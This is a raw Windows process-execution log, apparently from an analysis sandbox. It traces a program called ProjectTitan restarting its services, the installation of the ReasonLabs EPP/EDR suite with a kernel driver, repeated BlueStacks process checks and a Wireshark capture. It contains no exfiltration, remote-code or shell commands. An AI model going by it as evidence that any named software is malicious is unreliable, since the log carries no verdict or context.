tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files\McAfee\WebAdvisor\UIHost.exe
"C:\Program Files\McAfee\WebAdvisor\UIHost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM adb.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM ProjectTitan.exe
C:\Program Files\McAfee\WebAdvisor\updater.exe
"C:\Program Files\McAfee\WebAdvisor\updater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe
C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe -type 11
C:\Windows\SysWOW64\sc.exe
sc.exe stop AndroidKernel
C:\Windows\SysWOW64\sc.exe
sc.exe delete AndroidKernel
C:\Windows\SysWOW64\sc.exe
sc.exe stop TitanService
C:\Windows\SysWOW64\sc.exe
sc.exe delete TitanService
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Program Files\ReasonLabs\EPP\x64\rsKernelEngine.inf
C:\Windows\system32\runonce.exe
"C:\Windows\system32\runonce.exe" -r
C:\Windows\System32\grpconv.exe
"C:\Windows\System32\grpconv.exe" -o
C:\Windows\system32\wevtutil.exe
"C:\Windows\system32\wevtutil.exe" im C:\Program Files\ReasonLabs\EPP\x64\rsKernelEngineEvents.xml
C:\Windows\SYSTEM32\fltmc.exe
"fltmc.exe" load rsKernelEngine
C:\Windows\system32\wevtutil.exe
"C:\Windows\system32\wevtutil.exe" im C:\Program Files\ReasonLabs\EPP\elam\evntdrv.xml
C:\Program Files\ReasonLabs\EPP\rsWSC.exe
"C:\Program Files\ReasonLabs\EPP\rsWSC.exe" -i -i
C:\Program Files\ReasonLabs\EPP\rsWSC.exe
"C:\Program Files\ReasonLabs\EPP\rsWSC.exe"
C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe
"C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe" -i -i
C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe
"C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe"
C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe
"C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe" -i -i
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe
"C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe"
C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe
"C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe" -i -i
F:\ProjectTitan\Engine\Launcher.exe
F:\ProjectTitan\Engine\Launcher.exe --install-service
C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe
"C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe"
F:\ProjectTitan\Engine\TitanService.exe
"F:\ProjectTitan\Engine\TitanService.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe
C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe -type 1
\??\c:\program files\reasonlabs\epp\rsHelper.exe
"c:\program files\reasonlabs\epp\rsHelper.exe"
\??\c:\program files\reasonlabs\EPP\ui\EPP.exe
"c:\program files\reasonlabs\EPP\ui\EPP.exe" --minimized --first-run
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe
"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" "c:\program files\reasonlabs\EPP\ui\app.asar" --engine-path="c:\program files\reasonlabs\EPP" --minimized --first-run
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe
"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2200 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe
"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --mojo-platform-channel-handle=2660 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe
"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2832 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe
"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3860 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe
"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4288 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6364 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7256 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9384 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7788 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\program files\reasonlabs\epp\rsLitmus.A.exe
"C:\program files\reasonlabs\epp\rsLitmus.A.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
F:\ProjectTitan\Engine\Launcher.exe
"F:\ProjectTitan\Engine\Launcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
F:\ProjectTitan\Engine\ProjectTitan.exe
"F:\ProjectTitan\Engine\ProjectTitan.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe
"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=3616 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files\Wireshark\Wireshark.exe
"C:\Program Files\Wireshark\Wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files\Wireshark\extcap\etwdump.exe
"C:\Program Files\Wireshark\extcap\etwdump.exe" --extcap-interfaces --extcap-version=4.2
C:\Program Files\Wireshark\extcap\androiddump.exe
"C:\Program Files\Wireshark\extcap\androiddump.exe" --extcap-interfaces --extcap-version=4.2
C:\Program Files\Wireshark\extcap\udpdump.exe
"C:\Program Files\Wireshark\extcap\udpdump.exe" --extcap-interfaces --extcap-version=4.2
C:\Program Files\Wireshark\extcap\etwdump.exe
"C:\Program Files\Wireshark\extcap\etwdump.exe" --extcap-config --extcap-interface etwdump
C:\Program Files\Wireshark\extcap\udpdump.exe
"C:\Program Files\Wireshark\extcap\udpdump.exe" --extcap-config --extcap-interface udpdump
C:\Program Files\Wireshark\dumpcap.exe
"C:\Program Files\Wireshark\dumpcap.exe" -D -Z none
C:\Program Files\Wireshark\dumpcap.exe
"C:\Program Files\Wireshark\dumpcap.exe" -i \Device\NPF_Loopback -L --list-time-stamp-types -Z none
C:\Program Files\Wireshark\extcap\etwdump.exe
"C:\Program Files\Wireshark\extcap\etwdump.exe" --extcap-dlts --extcap-interface etwdump
C:\Program Files\Wireshark\extcap\udpdump.exe
"C:\Program Files\Wireshark\extcap\udpdump.exe" --extcap-dlts --extcap-interface udpdump
C:\Program Files\Wireshark\dumpcap.exe
"C:\Program Files\Wireshark\dumpcap.exe" -S -Z 9008.dummy
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files\Wireshark\dumpcap.exe
"C:\Program Files\Wireshark\dumpcap.exe" -n -i \Device\NPF_Loopback -Z 9008
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files\Wireshark\dumpcap.exe
"C:\Program Files\Wireshark\dumpcap.exe" -S -Z 9008.dummy
C:\Windows\system32\cmd.exe
